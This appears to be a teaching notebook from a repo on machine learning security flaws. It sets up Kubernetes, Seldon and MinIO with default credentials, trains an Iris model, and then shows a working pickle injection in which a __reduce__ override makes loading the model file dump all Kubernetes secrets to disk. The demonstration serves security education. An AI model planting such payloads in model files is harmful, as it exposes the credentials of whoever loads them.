[![Awesome](images/awesome.svg)](https://github.com/sindresorhus/awesome)
[![Maintenance](https://img.shields.io/badge/Maintained%3F-YES-green.svg)](https://github.com/EthicalML/awesome-production-machine-learning/graphs/commit-activity)
![GitHub](https://img.shields.io/badge/Release-PROD-yellow.svg)
![GitHub](https://img.shields.io/badge/Languages-MULTI-blue.svg)
![GitHub](https://img.shields.io/badge/License-MIT-lightgrey.svg)
[![GitHub](https://img.shields.io/twitter/follow/axsaucedo.svg?label=Follow)](https://twitter.com/AxSaucedo/)

# Flawed Machine Learning Security

This Repo contains a set of resources relevant to the talk "Secure Machine Learning at Scale with MLSecOps", and provides a set of examples to showcase practical common security flaws throughout the multiple phases of the machine learning lifecycle.

## Setup

Requirements on CLIs
* kubectl
* istioctl
* mc (minio client)
* Kubernetes > 1.18
* Python 3.7

### Setup Kubernetes Cluster

#### Install and setup Istio

In [ ]:
!istioctl install -y

In [ ]:
%%bash
kubectl apply -n istio-system -f - << END
apiVersion: networking.istio.io/v1alpha3
kind: Gateway
metadata:
  name: seldon-gateway
spec:
  selector:
    istio: ingressgateway # use istio default controller
  servers:
  - port:
      number: 80
      name: http
      protocol: HTTP
    hosts:
    - "*"
END

#### Setup Seldon Core

In [ ]:
%%bash
kubectl create ns seldon-system
helm upgrade --install \
    seldon-core seldon-core-operator \
    --repo https://storage.googleapis.com/seldon-charts  \
    --set usageMetrics.enabled=true --namespace seldon-system \
    --set istio.enabled="true" --set istio.gateway="seldon-gateway.istio-system.svc.cluster.local" \
    --version 1.13.1

#### Setup & configure MinIO

In [2]:
%%bash
kubectl create ns minio-system
helm repo add minio https://helm.min.io/
helm install minio minio/minio \
    --set accessKey=minioadmin \
    --set secretKey=minioadmin \
    --namespace minio-system

"minio" already exists with the same configuration, skipping
NAME: minio
LAST DEPLOYED: Sun Apr 10 13:24:52 2022
NAMESPACE: minio-system
STATUS: deployed
REVISION: 1
TEST SUITE: None
NOTES:
Minio can be accessed via port 9000 on the following DNS name from within your cluster:
minio.minio-system.svc.cluster.local

To access Minio from localhost, run the below commands:

  1. export POD_NAME=$(kubectl get pods --namespace minio-system -l "release=minio" -o jsonpath="{.items[0].metadata.name}")

  2. kubectl port-forward $POD_NAME 9000 --namespace minio-system

Read more about port forwarding here: http://kubernetes.io/docs/user-guide/kubectl/kubectl_port-forward/

You can now access Minio server on http://localhost:9000. Follow the below steps to connect to Minio server with mc client:

  1. Download the Minio mc client - https://docs.minio.io/docs/minio-client-quickstart-guide

  2. Get the ACCESS_KEY=$(kubectl get secret minio -o jsonpath="{.data.accesskey}" | base64 --decode) and the

Error from server (AlreadyExists): namespaces "minio-system" already exists


Once minio is runnning you need to open another terminal and run:
```
kubectl port-forward -n minio-system svc/minio 9000:9000
```

In [5]:
!mc config host add minio-seldon http://localhost:9000 minioadmin minioadmin

Added `minio-seldon` successfully.


In [6]:
%%bash
kubectl apply -f - << END
apiVersion: v1
kind: Secret
metadata:
  name: seldon-init-container-secret
type: Opaque
stringData:
  RCLONE_CONFIG_S3_TYPE: s3
  RCLONE_CONFIG_S3_PROVIDER: minio
  RCLONE_CONFIG_S3_ACCESS_KEY_ID: minioadmin
  RCLONE_CONFIG_S3_SECRET_ACCESS_KEY: minioadmin
  RCLONE_CONFIG_S3_ENDPOINT: http://minio.minio-system.svc.cluster.local:9000
  RCLONE_CONFIG_S3_ENV_AUTH: "false"
END

secret/seldon-init-container-secret created


## Model Training

#### Install requirements for model

In [7]:
%%writefile requirements.txt
seldon_core
scikit-learn == 0.24.2
numpy >= 1.8.2
joblib == 0.16.0

Writing requirements.txt


In [ ]:
!pip install -r requirements.txt

#### Import datasets to train Iris model

In [1]:
from sklearn import datasets

iris = datasets.load_iris()
X, y = iris.data, iris.target

#### Import simple LogsticRegression model

In [2]:
from sklearn.linear_model import LogisticRegression

model = LogisticRegression(solver="liblinear", multi_class='ovr')

#### Train model with dataset

In [3]:
model.fit(X, y)

LogisticRegression(multi_class='ovr', solver='liblinear')

#### Run prediction to test model

In [4]:
model.predict(X[:1])

array([0])

#### Dump model binary with pickle

In [5]:
import joblib

joblib.dump(model, "model.joblib")

['model.joblib']

In [ ]:
!bat model.joblib

## Load Pickle and Inject Malicious Code

In [7]:
import joblib

model_safe = joblib.load("model.joblib")

In [8]:
model_safe.predict(X[:1])

array([0])

In [9]:
import types, os

def __reduce__(self):
    cmd = "kubectl get secrets -o yaml > kubernetes-secrets.txt"
    return os.system, (cmd,)

In [10]:
model_safe.__class__.__reduce__ = types.MethodType(__reduce__, model_safe.__class__)

In [11]:
joblib.dump(model_safe, "model_unsafe.joblib")

['model_unsafe.joblib']

In [ ]:
!bat model_unsafe.joblib

#### Now reload the insecure pickle

In [15]:
!ls kubernetes-secrets.txt

ls: cannot access 'kubernetes-secrets.txt': No such file or directory


In [16]:
import joblib

model_unsafe = joblib.load("model_unsafe.joblib")

In [17]:
!head -4 kubernetes-secrets.txt

apiVersion: v1
items:
- apiVersion: v1
  data:
